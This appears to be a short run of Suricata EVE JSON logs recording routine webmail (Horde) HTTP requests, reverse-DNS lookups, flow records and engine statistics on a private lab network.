{"timestamp":"2020-02-29T00:08:13.158140+0000","flow_id":1596077147384852,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34766,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=compose&type=new&token=zwiFi46-w1WbjcxymnmTfV7&uniq=1582934887646","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5164},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":17865,"tx_id":0}} {"timestamp":"2020-02-29T00:08:16.284764+0000","flow_id":422558938389413,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52704,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2313,"tx_id":0}} {"timestamp":"2020-02-29T00:08:17.000297+0000","flow_id":285025491706982,"event_type":"flow","src_ip":"192.168.10.130","src_port":34758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1291,"bytes_toclient":1058,"start":"2020-02-29T00:07:11.418918+0000","end":"2020-02-29T00:07:16.615880+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:18.000294+0000","event_type":"stats","stats":{"uptime":14150,"capture":{"kernel_packets":134019,"kernel_drops":0},"decoder":{"pkts":134025,"bytes":92636252,"invalid":183,"ipv4":132560,"ipv6":8,"ethernet":134025,"raw":0,"null":0,"sll":0,"tcp":127404,"udp":4958,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095328},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2722,"ssn_memcap_drop":0,"pseudo":342,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2738,"synack":2729,"rst":1197,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1764,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2262,"failed_udp":110},"tx":{"http":4560,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2340}},"flow_mgr":{"closed_pruned":2702,"new_pruned":15,"est_pruned":2313,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19842,"memcap_state":0,"memcap_global":0},"http":{"memuse":37501,"memcap":0}}} {"timestamp":"2020-02-29T00:08:20.380494+0000","flow_id":957166403243598,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34478,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58896,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:20.488895+0000","flow_id":957166403243598,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34478,"proto":"UDP","dns":{"type":"answer","id":58896,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:20.488895+0000","flow_id":957166403243598,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34478,"proto":"UDP","dns":{"type":"answer","id":58896,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:20.578523+0000","flow_id":533480764378464,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52706,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364}} {"timestamp":"2020-02-29T00:08:20.578523+0000","flow_id":533480764378464,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52706,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":240,"tx_id":0}} {"timestamp":"2020-02-29T00:08:21.001904+0000","flow_id":97464254789635,"event_type":"flow","src_ip":"192.168.10.122","src_port":35466,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:20.456707+0000","end":"2020-02-29T00:03:20.562100+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:25.000275+0000","event_type":"stats","stats":{"uptime":14157,"capture":{"kernel_packets":134030,"kernel_drops":0},"decoder":{"pkts":134037,"bytes":92638832,"invalid":183,"ipv4":132572,"ipv6":8,"ethernet":134037,"raw":0,"null":0,"sll":0,"tcp":127414,"udp":4960,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095328},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2723,"ssn_memcap_drop":0,"pseudo":342,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2739,"synack":2730,"rst":1197,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1765,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2263,"failed_udp":110},"tx":{"http":4561,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2341}},"flow_mgr":{"closed_pruned":2703,"new_pruned":15,"est_pruned":2314,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19841,"memcap_state":0,"memcap_global":0},"http":{"memuse":76699,"memcap":0}}} {"timestamp":"2020-02-29T00:08:25.579747+0000","flow_id":533480764378464,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52706,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":592,"tx_id":0}} {"timestamp":"2020-02-29T00:08:26.000572+0000","flow_id":1214181537235511,"event_type":"flow","src_ip":"192.168.10.81","src_port":52696,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":9,"bytes_toserver":1227,"bytes_toclient":6723,"start":"2020-02-29T00:07:20.213559+0000","end":"2020-02-29T00:07:25.402051+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:26.322012+0000","flow_id":427648475654620,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47740,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35129,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:26.430911+0000","flow_id":427648475654620,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47740,"proto":"UDP","dns":{"type":"answer","id":35129,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:26.430911+0000","flow_id":427648475654620,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47740,"proto":"UDP","dns":{"type":"answer","id":35129,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:26.514026+0000","flow_id":1506149123404467,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34768,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8618}} {"timestamp":"2020-02-29T00:08:26.884224+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49361,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":65193,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:26.992939+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49361,"proto":"UDP","dns":{"type":"answer","id":65193,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:26.992939+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49361,"proto":"UDP","dns":{"type":"answer","id":65193,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:27.011353+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49361,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":65194,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:08:27.119823+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49361,"proto":"UDP","dns":{"type":"answer","id":65194,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:27.119823+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49361,"proto":"UDP","dns":{"type":"answer","id":65194,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:31.518716+0000","flow_id":1506149123404467,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34768,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8618},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":34775,"tx_id":0}} {"timestamp":"2020-02-29T00:08:32.000293+0000","event_type":"stats","stats":{"uptime":14164,"capture":{"kernel_packets":134072,"kernel_drops":0},"decoder":{"pkts":134077,"bytes":92653227,"invalid":184,"ipv4":132612,"ipv6":8,"ethernet":134077,"raw":0,"null":0,"sll":0,"tcp":127447,"udp":4966,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2725,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2741,"synack":2732,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1766,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2265,"failed_udp":110},"tx":{"http":4562,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2344}},"flow_mgr":{"closed_pruned":2704,"new_pruned":15,"est_pruned":2314,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20503,"memcap_state":0,"memcap_global":0},"http":{"memuse":71338,"memcap":0}}} {"timestamp":"2020-02-29T00:08:33.000196+0000","flow_id":282835044059291,"event_type":"flow","src_ip":"192.168.10.122","src_port":46479,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:32.247963+0000","end":"2020-02-29T00:03:32.359559+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:38.305553+0000","flow_id":1562984426416529,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38137,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":18336,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:38.414838+0000","flow_id":1562984426416529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38137,"proto":"UDP","dns":{"type":"answer","id":18336,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:38.414838+0000","flow_id":1562984426416529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38137,"proto":"UDP","dns":{"type":"answer","id":18336,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:38.458150+0000","flow_id":1380207798145143,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:08:38.458150+0000","flow_id":1380207798145143,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":12,"tx_id":0}} {"timestamp":"2020-02-29T00:08:39.000204+0000","event_type":"stats","stats":{"uptime":14171,"capture":{"kernel_packets":134077,"kernel_drops":0},"decoder":{"pkts":134081,"bytes":92653443,"invalid":184,"ipv4":132614,"ipv6":8,"ethernet":134081,"raw":0,"null":0,"sll":0,"tcp":127449,"udp":4966,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2725,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2741,"synack":2732,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1766,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2265,"failed_udp":110},"tx":{"http":4562,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2344}},"flow_mgr":{"closed_pruned":2704,"new_pruned":15,"est_pruned":2315,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20503,"memcap_state":0,"memcap_global":0},"http":{"memuse":41799,"memcap":0}}} {"timestamp":"2020-02-29T00:08:40.000530+0000","flow_id":1337983970224512,"event_type":"flow","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":12,"bytes_toserver":2799,"bytes_toclient":7443,"start":"2020-02-29T00:07:30.108928+0000","end":"2020-02-29T00:07:39.863656+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:43.465641+0000","flow_id":1380207798145143,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34772,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:08:44.000493+0000","flow_id":322507671114127,"event_type":"flow","src_ip":"192.168.10.130","src_port":34756,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":24,"bytes_toserver":2313,"bytes_toclient":23216,"start":"2020-02-29T00:07:08.037263+0000","end":"2020-02-29T00:07:43.801338+0000","age":35,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:46.000206+0000","event_type":"stats","stats":{"uptime":14178,"capture":{"kernel_packets":134091,"kernel_drops":0},"decoder":{"pkts":134094,"bytes":92655563,"invalid":184,"ipv4":132627,"ipv6":8,"ethernet":134094,"raw":0,"null":0,"sll":0,"tcp":127460,"udp":4968,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2726,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2742,"synack":2733,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1767,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2266,"failed_udp":110},"tx":{"http":4563,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2345}},"flow_mgr":{"closed_pruned":2705,"new_pruned":15,"est_pruned":2315,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20503,"memcap_state":0,"memcap_global":0},"http":{"memuse":23423,"memcap":0}}} {"timestamp":"2020-02-29T00:08:48.000762+0000","flow_id":106092845825221,"event_type":"flow","src_ip":"192.168.10.122","src_port":45285,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:47.425157+0000","end":"2020-02-29T00:03:47.531143+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:48.001048+0000","flow_id":1247342965809315,"event_type":"flow","src_ip":"192.168.10.122","src_port":48919,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:03:47.581795+0000","end":"2020-02-29T00:03:47.693010+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:53.000221+0000","event_type":"stats","stats":{"uptime":14185,"capture":{"kernel_packets":134091,"kernel_drops":0},"decoder":{"pkts":134094,"bytes":92655563,"invalid":184,"ipv4":132627,"ipv6":8,"ethernet":134094,"raw":0,"null":0,"sll":0,"tcp":127460,"udp":4968,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095328},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2726,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2742,"synack":2733,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1767,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2266,"failed_udp":110},"tx":{"http":4563,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2345}},"flow_mgr":{"closed_pruned":2706,"new_pruned":15,"est_pruned":2317,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19842,"memcap_state":0,"memcap_global":0},"http":{"memuse":23423,"memcap":0}}} 